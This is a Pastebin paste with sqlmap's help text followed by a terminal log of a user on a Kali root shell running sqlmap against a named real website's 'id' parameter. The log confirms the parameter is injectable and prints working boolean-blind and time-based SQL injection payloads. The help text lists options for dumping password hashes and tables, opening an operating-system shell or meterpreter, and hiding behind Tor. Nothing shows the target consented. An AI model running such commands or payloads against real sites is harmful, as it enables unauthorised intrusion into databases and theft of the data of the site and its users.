API tools faq
paste
Advertisement
Guest User

sql BigByte

a guest
Jan 25th, 2014
298
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.32 KB | None | 0 0
raw download clone embed print report
  1. Usage: python ./sqlmap [options]
  2.  
  3. Options:
  4. -h, --help Show basic help message and exit
  5. -hh Show advanced help message and exit
  6. -v VERBOSE Verbosity level: 0-6 (default 1)
  7.  
  8. Target:
  9. At least one of these options has to be specified to set the source to
  10. get target urls from
  11.  
  12. -u URL, --url=URL Target url
  13. -g GOOGLEDORK Process Google dork results as target urls
  14.  
  15. Request:
  16. These options can be used to specify how to connect to the target url
  17.  
  18. --data=DATA Data string to be sent through POST
  19. --cookie=COOKIE HTTP Cookie header
  20. --random-agent Use randomly selected HTTP User-Agent header
  21. --proxy=PROXY Use a HTTP proxy to connect to the target url
  22.  
  23. Injection:
  24. These options can be used to specify which parameters to test for,
  25. provide custom injection payloads and optional tampering scripts
  26.  
  27. -p TESTPARAMETER Testable parameter(s)
  28. --dbms=DBMS Force back-end DBMS to this value
  29.  
  30. Detection:
  31. These options can be used to specify how to parse and compare page
  32. content from HTTP responses when using blind SQL injection technique
  33.  
  34. --level=LEVEL Level of tests to perform (1-5, default 1)
  35. --risk=RISK Risk of tests to perform (0-3, default 1)
  36.  
  37. Techniques:
  38. These options can be used to tweak testing of specific SQL injection
  39. techniques
  40.  
  41. --technique=TECH SQL injection techniques to test for (default
  42. "BEUSTQ")
  43.  
  44. Enumeration:
  45. These options can be used to enumerate the back-end database
  46. management system information, structure and data contained in the
  47. tables. Moreover you can run your own SQL statements
  48.  
  49. -a, --all Retrieve everything
  50. -b, --banner Retrieve DBMS banner
  51. --current-user Retrieve DBMS current user
  52. --current-db Retrieve DBMS current database
  53. --passwords Enumerate DBMS users password hashes
  54. --tables Enumerate DBMS database tables
  55. --columns Enumerate DBMS database table columns
  56. --schema Enumerate DBMS schema
  57. --dump Dump DBMS database table entries
  58. --dump-all Dump all DBMS databases tables entries
  59. -D DB DBMS database to enumerate
  60. -T TBL DBMS database table to enumerate
  61. -C COL DBMS database table column to enumerate
  62.  
  63. Operating system access:
  64. These options can be used to access the back-end database management
  65. system underlying operating system
  66.  
  67. --os-shell Prompt for an interactive operating system shell
  68. --os-pwn Prompt for an out-of-band shell, meterpreter or VNC
  69.  
  70. General:
  71. These options can be used to set some general working parameters
  72.  
  73. --batch Never ask for user input, use the default behaviour
  74. --check-tor Check to see if Tor is used properly
  75. --flush-session Flush session files for current target
  76. --tor Use Tor anonymity network
  77.  
  78. Miscellaneous:
  79. --wizard Simple wizard interface for beginner users
  80.  
  81. [!] to see full list of options run with '-hh'
  82.  
  83. [*] shutting down at 12:15:11
  84.  
  85. root@kali:~# sqlmap -u www.fabasket.com/noticia.php?id=1007 --dbs
  86.  
  87. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  88. http://sqlmap.org
  89.  
  90. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  91.  
  92. [*] starting at 12:15:29
  93.  
  94. [12:15:29] [INFO] testing connection to the target url
  95. [12:15:30] [INFO] testing if the url is stable, wait a few seconds
  96. [12:15:32] [INFO] url is stable
  97. [12:15:32] [INFO] testing if GET parameter 'id' is dynamic
  98. [12:15:32] [INFO] confirming that GET parameter 'id' is dynamic
  99. [12:15:32] [INFO] GET parameter 'id' is dynamic
  100. [12:15:33] [INFO] heuristic (parsing) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  101. [12:15:33] [INFO] testing for SQL injection on GET parameter 'id'
  102. heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
  103. do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] y
  104. [12:15:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  105. [12:16:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  106. [12:16:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  107. [12:16:06] [WARNING] reflective value(s) found and filtering out
  108. [12:16:12] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
  109. [12:16:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
  110. [12:16:19] [INFO] GET parameter 'id' is 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' injectable
  111. [12:16:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  112. [12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  113. [12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
  114. [12:16:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  115. [12:16:19] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
  116. [12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  117. [12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
  118. [12:16:20] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
  119. [12:16:21] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
  120. [12:16:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
  121. [12:16:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  122. [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
  123. [12:16:22] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
  124. [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
  125. [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
  126. [12:16:22] [INFO] testing 'MySQL inline queries'
  127. [12:16:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  128. [12:16:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  129. [12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  130. [12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
  131. [12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
  132. [12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
  133. [12:16:23] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  134. [12:16:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
  135. [12:16:24] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
  136. [12:16:25] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
  137. [12:16:25] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
  138. [12:17:25] [INFO] GET parameter 'id' is 'MySQL time-based blind - Parameter replace (bool*int)' injectable
  139. [12:17:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  140. [12:17:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
  141. [12:17:34] [INFO] target url appears to be UNION injectable with 1 columns
  142. [12:17:35] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
  143. [12:17:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
  144. [12:17:40] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
  145. [12:17:48] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
  146. [12:17:55] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
  147. [12:18:03] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
  148. [12:18:13] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
  149. [12:18:18] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
  150. [12:18:22] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
  151. [12:18:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
  152. [12:18:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  153. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  154. sqlmap identified the following injection points with a total of 301 HTTP(s) requests:
  155. ---
  156. Place: GET
  157. Parameter: id
  158. Type: boolean-based blind
  159. Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
  160. Payload: id=MAKE_SET(3807=3807,1007)
  161.  
  162. Type: AND/OR time-based blind
  163. Title: MySQL time-based blind - Parameter replace (bool*int)
  164. Payload: id=(1006=1006)*SLEEP(5)
  165. ---
  166. [12:18:48] [INFO] testing MySQL
  167. [12:18:48] [WARNING] the back-end DBMS is not MySQL
  168. [12:18:48] [INFO] testing Oracle
  169. [12:18:49] [WARNING] the back-end DBMS is not Oracle
  170. [12:18:49] [INFO] testing PostgreSQL
  171. [12:18:49] [WARNING] the back-end DBMS is not PostgreSQL
  172. [12:18:49] [INFO] testing Microsoft SQL Server
  173. [12:18:49] [WARNING] the back-end DBMS is not Microsoft SQL Server
  174. [12:18:49] [INFO] testing SQLite
  175. [12:18:49] [WARNING] the back-end DBMS is not SQLite
  176. [12:18:49] [INFO] testing Microsoft Access
  177. [12:18:49] [WARNING] the back-end DBMS is not Microsoft Access
  178. [12:18:49] [INFO] testing Firebird
  179. [12:18:49] [WARNING] the back-end DBMS is not Firebird
  180. [12:18:49] [INFO] testing SAP MaxDB
  181. [12:18:50] [WARNING] the back-end DBMS is not SAP MaxDB
  182. [12:18:50] [INFO] testing Sybase
  183. [12:18:50] [WARNING] the back-end DBMS is not Sybase
  184. [12:18:50] [INFO] testing IBM DB2
  185. [12:18:50] [WARNING] the back-end DBMS is not IBM DB2
  186. [12:18:50] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is MySQL. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
  187.  
  188. [*] shutting down at 12:18:50
  189.  
  190. root@kali:~#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!